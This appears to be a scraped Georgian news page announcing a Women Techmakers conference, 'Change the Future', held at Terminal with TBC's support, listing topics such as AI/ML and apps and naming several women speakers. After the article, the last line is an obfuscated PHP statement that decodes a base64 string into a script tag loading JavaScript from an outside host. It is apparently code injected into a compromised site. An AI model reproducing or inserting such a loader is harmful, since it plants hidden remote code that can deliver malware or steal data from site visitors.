celsiusi
ავერსი საქკაბელი

14 მარტს 13:00 საათზე ტერმინალი მასშტაბურ ტექნოლოგიურ ღონისძიებას „შეცვალე მომავალს“ უმასპინძლებს. თიბისის მხარდაჭერით ღონისძიების ორგანიზატორები Google-ის ქალთა ტექნოლოგიებში გაძლიერების პროგრამის ელჩები არიან. პროგრამა ეძღვნება ტექნოლოგიაში გენდერული გამოწვევების გადალახვას და ისეთი სამყაროს შექმნას, სადაც ყველა ქალს შეუძლია ტექნოლოგიებში განვითარდეს.

კონფერენციაზე საგანმანათლებლო და ნეთვორქინგ აქტივობები სამ პარალელურ სივრცეში ჩატარდება. ღონისძიების მთავარი თემებია ხელოვნური ინტელექტი (AI/ML), ვებ აპლიკაციები (Android/iOS), სამეცნიერო-ტექნოლოგიური ინოვაციები, და ტექნოლოგიები განათლებაში.

ღონისძიების მიზანი არა მხოლოდ მსმენელთათვის საინტერესო თემების შეთავაზება და კომფორტული გარემოს შექმნა, არამედ მოტივაციაა ქალებისთვის საკუთარი ცოდნისა და გამოცდილების გაზიარებისთვის.

სწორედ ამიტომ, ღონისძიებაზე საკუთარ ცოდნას ისეთი ტექ პროფესიონალები გააზიარებენ, როგორიცაა:

ნინუცა ნანიტაშვილი, ნათია სირბილაძე, ელენე კვარაცხელია, ალინა ტყაბლაძე, ნანა დიხამინჯია, ნანა ქავთარაშვილი, მარიამ გაგუა და სხვა..

Google-მა ტექნოლოგიურ სფეროში მომუშავე ქალებისთვის Women Techmakers-ის პროგრამა შექმნა, რომელიც პროგრამული უზრუნველყოფის ინჟინერ, მობილური სისტემების დეველოპერ და მონაცემთა მეცნიერ ქალებს უსაზღვრო განვითარების საშუალებას აძლევს. ეს კომუნა საქართველოში 2014 წლიდან არსებობს.

თიბისისთვის, როგორც ტექნოლოგიური კომპანიისთვის, პრიორიტეტად რჩება მომხმარებელი, რის გამოც კომპანია ტექნოლოგიურ პროგრესსა და მუდმივი ცვლილებებით ადამიანებისთვის ცხოვრების გამარტივებაზეა ორიენტირებული. სწორედ ამიტომ, თიბისისთვის მნიშვნელოვანია ისეთი ტექნოლოგიური ღონისძიებების მხარდაჭერა, სადაც ტექ პროფესიონალების ჩართულობა მაქსიმალურადაა წახალისებული.

თიბისი არაერთი ინიციატივით უჭერს მხარს ქალების გაძლიერებას ტექნოლოგიებში, ერთ-ერთი ასეთი წამოწყება გრეის ჰოპერის ტექ ჯილდოა, რომელიც საზოგადოების ყურადღებას ტექნოლოგიების სფეროში გენდერული თანასწორობის მნიშვნელობისკენ მიმართავს. ღონისძიება იმ ლიდერებს გვაცნობს, რომლებიც ქალების გაძლიერების მიმართულებით მისაბაძი მაგალითები არიან.

248
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");